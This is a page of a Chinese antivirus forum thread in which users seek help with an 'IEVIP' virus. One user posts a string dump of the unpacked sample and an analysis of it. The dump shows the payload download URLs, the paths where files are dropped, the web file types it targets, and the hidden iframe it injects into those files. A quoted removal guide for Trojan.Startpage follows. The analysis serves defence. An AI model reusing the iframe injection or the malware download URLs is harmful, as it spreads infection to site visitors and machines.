瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 继续求助,机器感染IEVIP病毒!无法修复感染程序文件!!

12   2  /  2  页   跳转

继续求助,机器感染IEVIP病毒!无法修复感染程序文件!!

提取加的头
脱壳头后w32dasm反编译
串式参考
String Resource ID=65535: "Floating point overflow"
"  "
" AMPM"
"
"
""
"$$"
"*.asp"
"*.aspx"
"*.exe"
"*.htm"
"*.html"
"*.jsp"
"*.php"
".."
":"
":\"
":mm"
":mm:ss"
"\*.*"
"\:"
"\\"
"`V?"
"<iframe height=0 src=http://dhz.810810.org/vip"
"00"
"0x"
"11"
"1蓞襱-Rf;
t f;Jtf;Jtf;Jt兟脘兟兟兟壯"
"95744"
"A/P"
"AAA"
"AAAA"
"am"
"AM"
"AM/PM"
"AMPM "
"AMPM"
"Any"
"Array "
"ByRef "
"c:\ievip.exe          "
"c:\qwe34.exe          "
"c:\qwea.exe            "
"c:\qwetop.exe          "
"c:\qwevip.exe          "
"c:\xiami.exe"
"c:\xz.exe"
"CC"
"ddd"
"ee"
"eeee"
"Empty"
"Error"
"False"
"FPUMaskValue"
"FuckJP"
"GetDiskFreeSpaceExA"
"GetLongPathNameA"
"gg"
"ggg"
"hh"
"http://at2.810810.org/ievip.exe"
"http://at2.810810.org/qwe34.exe"
"http://at2.810810.org/qwea.exe"
"http://at2.810810.org/qwetop.exe"
"http://at2.810810.org/qwevip.exe"
"http://www.c1j8.co5/xz.exe"
"http://www.p544.c5/xiami.exe"
"IEFrame"
"iexplore.exe"
"kernel32.dll"
"m/d/yy"
"mmmm d, yyyy"
"MZ"
"nil"
"open"
"pm"
"PM"
"Software\Borland\Delphi\Locales"
"SOFTWARE\Borland\Delphi\RTL"
"Software\Borland\Locales"
"String"
"Strings"
"S嬟嬓ttJ€?r??學??怶?%"
"True"
"U嬱?@"
"U嬱3蒕QQQQS3繳h?d0d?岴?桷岴?"
"U嬱j"
"U嬱SV3龌"
"U嬱兡?蓧M魤U鴫E?繳h?d0d?"
"U嬱兡鬝VW3蓧M魤U鴫E?繳hd0d?"
"U嬱兡鳶3缐E?繳hQ?d0d?亇"
"VarAdd"
"VarAnd"
"VarBoolFromStr"
"VarBstrFromBool"
"VarBstrFromCy"
"VarBstrFromDate"
"VarCmp"
"VarCyFromStr"
"VarDateFromStr"
"VarDiv"
"VarI4FromStr"
"VariantChangeTypeEx"
"VarIdiv"
"VarMod"
"VarMul"
"VarNeg"
"VarNot"
"VarOr"
"VarR4FromStr"
"VarR8FromStr"
"VarSub"
"VarXor"
"yy"
"yyyy"
"婦$鰼"
"鑷??"
"鴊"


看来http://dhz.810810.org/vip这个是下载源之一
"http://at2.810810.org/ievip.exe"
"http://at2.810810.org/qwe34.exe"
"http://at2.810810.org/qwea.exe"
"http://at2.810810.org/qwetop.exe"
"http://at2.810810.org/qwevip.exe"
"http://www.c1j8.co5/xz.exe"
"http://www.p544.c5/xiami.exe"

在硬盘上
c:\ievip.exe          "
"c:\qwe34.exe          "
"c:\qwea.exe            "
"c:\qwetop.exe          "
"c:\qwevip.exe          "
"c:\xiami.exe"
"c:\xz.exe"
不过刚刚开始时候应该从IE缓存中进入
被kaka助手拦截```



gototop
 

继续```下午不注意也中了``不过就是一个逻辑盘```修复郁闷
用winhex```有时间写个修复工具出来~~~
通过楼上分析可以看出在模仿烧香~~
感染
"*.asp"
"*.aspx"
"*.htm"
"*.html"
"*.jsp"
"*.php"
在这些文件后加入
"<iframe height=0 src=http://dhz.810810.org/vip>"
后面我是用far批量替换的~~

gototop
 

引用:
【职业扫毒手的贴子】许多电脑用户会经常遇到自己的防毒软件报告发现 Trojan.Startpage 这种病毒但却无法清除和隔离它的情况, 或者是在清除后不久它又出现了,让人非常苦恼。这时该怎么办呢?

其实 Trojan.Startpage 是某些防毒软件对某一类木马的统称,它并不代表着固定的一个,而是一类,所以即使遇到同样名子的木马可能它们也并不相同。 费尔托斯特安全是一款可以清除木马和病毒的软件,并且有很强的清除能力,如果您有它的正式版可以在升级到最新病毒库后尝试用它扫描清除一下,但这里需要特别提醒一点: 由于这类木马新变种层出不穷,所以不能保证费尔托斯特安全能够识别出目前所有的或者您遇到的。 那么除此之外难道就没有其他办法了吗?有的,下面就介绍一个借助免费工具“费尔木马强力清除助手”(此工具已经集成到费尔托斯特安全新版本中了)来清除这种顽固性 Trojan.Startpage 木马的方法:
使用这个方法前必须要先知道这个木马的文件名是什么。防毒软件在发现木马后一般都会报告它的完整文件名,您需要先准确的记录下这个文件名。比如:如果防毒软件提示 C:\Windows\hello.dll 是 Trojan.Startpage,则记下 C:\Windows\hello.dll 这个名子。这里需要注意文件名一定要记准确,因为有许多木马会把自己的文件名故意伪装成和正常的文件名很接近,比如 svch0st.exe(木马)->svchost.exe(正常)、Expl0rer.exe(木马)->Explorer.exe(正常)、intrenat.exe / internet.exe(木马)->internat.exe(正常)等等。特别是数字0几乎和大写字母O一样,很容易让人看错,所以一定要注意区分它们,否则万一记错将有可能把正常的文件清除掉,那就麻烦了;
暂停防毒软件的实时监控,这一点很重要,否则在清除时可能会被阻止而无法成功。比如如果当初是你的诺顿发现了这个木马,那么请先暂停诺顿的实时监控或实时扫描;
下载费尔木马强力清除助手 ;
释放 PowerRmv.zip 到一个目录,然后执行其中的 PowerRmv.exe 启动“费尔木马强力清除助手”。在“文件名”中输入要清除的木马文件名。比如如果您在第1步中记下的文件名是 C:\Windows\hello.dll,那么这时就输入它;
按“清除”。这时程序会询问你是否要举报此病毒到费尔安全实验室,建议点“是”表示同意。接着程序会继续提示是否确定要清除它,仍然选“是”;
之后,如果此木马被成功清除程序会提示成功;或者也可能提示此木马无法被立即删除需要重启电脑。无论是哪种情况请点击“确定”,这时如果您在前面同意了举报此木马那么程序会自动创建并打开一个“病毒举报”的电子邮件,其中会包含这个木马的样本文件,如果您看到了这个邮件请把它直接发送给 virus@filseclab.com 。如果您并没有看到这封邮件也没有关系,可以忽略。
最后,如果程序前面提示了重启电脑后才能清除那么请一定重启您的电脑,在电脑重启后这个木马应该就被清除掉了。

我的病毒名字是ievip,不知道怎么查!
gototop
 

瑞星病毒库更新至本月26日,所感染的可执行文件已经可以识别,但是均无法处理,我设置的无法清除的时候删除病毒文件,如此以来,意味着我系统里的一些专用软件将无法使用。
不管怎么说,感谢近几天来帮助过我的朋友们,深深给大家鞠躬了!
不过,问题依然没有解决,我还是有点感触,稍候专门发文,大家指正。
gototop
 

瑞星病毒库更新至本月26日,所感染的可执行文件已经可以识别,但是均无法处理,我设置的无法清除的时候删除病毒文件,如此以来,意味着我系统里的一些专用软件将无法使用。
不管怎么说,感谢近几天来帮助过我的朋友们,深深给大家鞠躬了!
不过,问题依然没有解决,我还是有点感触,稍候专门发文,大家指正。
gototop
 
12   2  /  2  页   跳转
页面顶部
Powered by Discuz!NT